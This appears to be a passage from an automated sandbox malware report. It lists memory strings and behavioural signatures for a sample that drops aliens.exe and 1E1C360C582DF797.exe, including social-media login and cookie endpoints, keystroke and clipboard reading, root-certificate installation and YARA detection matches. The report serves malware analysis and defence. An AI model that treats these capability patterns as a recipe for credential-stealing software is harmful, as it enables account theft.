Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: 1E1C360C582DF797.exe, 00000015.00000003.563235849.0000000005D32000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmpZk
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/ookie:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comReferer:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.google.com/cloudprint
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN9
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint7=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingP
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641821279.0000000005C56000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc2
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevicesH
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/h
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangoutse2/crx
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra/crx0
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accept:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/origin:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050F9
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1

E-Banking Fraud:

barindex
Registers a new ROOT certificate
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 4_2_1001F720
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E624C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,FindCloseChangeNotification,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle, 0_2_6E624C20

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: aliens.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1E1C360C582DF797.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 4_2_10019D40
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 4_2_10019F00
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 4_2_10019F50
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 4_2_10019FA0
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01217165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 1_2_01217165
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
Detected potential crypto function
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004079A2 0_2_004079A2
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004049A8 0_2_004049A8
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406EFE 0_2_00406EFE
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_0040737E 0_2_0040737E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66CE40 0_2_6E66CE40
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66AE3E 0_2_6E66AE3E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E679FF6 0_2_6E679FF6
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E67BC5D 0_2_6E67BC5D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E67FC01 0_2_6E67FC01
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E67BB3D 0_2_6E67BB3D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E657714 0_2_6E657714
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6677A0 0_2_6E6677A0
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66756E 0_2_6E66756E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66733C 0_2_6E66733C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01218525 1_2_01218525
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012265B6 1_2_012265B6
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01230146 1_2_01230146
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121E1E0 1_2_0121E1E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122702F 1_2_0122702F
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121404E 1_2_0121404E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121326D 1_2_0121326D
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123457A 1_2_0123457A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123055E 1_2_0123055E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01223731 1_2_01223731
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012347A9 1_2_012347A9
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121E7E0 1_2_0121E7E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012127D4 1_2_012127D4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012239AC 1_2_012239AC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01230993 1_2_01230993
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012269EB 1_2_012269EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121F8A8 1_2_0121F8A8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01225BE7 1_2_01225BE7
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123CA20 1_2_0123CA20
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121BD53 1_2_0121BD53
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121DDAC 1_2_0121DDAC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01230DC8 1_2_01230DC8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122FC4A 1_2_0122FC4A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121EC54 1_2_0121EC54
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01223CDD 1_2_01223CDD
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01215F0C 1_2_01215F0C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01240FD4 1_2_01240FD4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123CECE 1_2_0123CECE
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00403DA8 4_2_00403DA8
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00407071 4_2_00407071
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000C063 4_2_1000C063
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000B883 4_2_1000B883
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100060F0 4_2_100060F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100169BD 4_2_100169BD
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100099E0 4_2_100099E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100071F0 4_2_100071F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10009257 4_2_10009257
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10010AED 4_2_10010AED
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10008340 4_2_10008340
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000E380 4_2_1000E380
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000ABA0 4_2_1000ABA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000B3B0 4_2_1000B3B0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001EBD0 4_2_1001EBD0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100083F0 4_2_100083F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000BC57 4_2_1000BC57
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000C483 4_2_1000C483
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10010590 4_2_10010590
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001EDDB 4_2_1001EDDB
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000FF71 4_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026EB7CE 21_2_026EB7CE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E75D0 21_2_026E75D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DEAA1 21_2_026DEAA1
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026F2BB0 21_2_026F2BB0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E6D04 21_2_026E6D04
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E93BFE 21_2_04E93BFE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E8E58A 21_2_04E8E58A
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04EA0780 21_2_04EA0780
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E8C019 21_2_04E8C019
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E83C51 21_2_04E83C51
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04EA2F70 21_2_04EA2F70
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\71eza90awf48\aliens.exe 6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: String function: 04E61320 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: String function: 026E9F94 appears 49 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: String function: 6E627EA0 appears 41 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: String function: 0122E1C0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: String function: 0122E0E4 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: String function: 0122EB60 appears 31 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: String function: 004067A9 appears 58 times
PE file contains strange resources
Source: h1GodtbhC8.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSibClr.dll. vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSibuia.dllN vs h1GodtbhC8.exe
Tries to load missing DLLs
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Yara signature match
Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
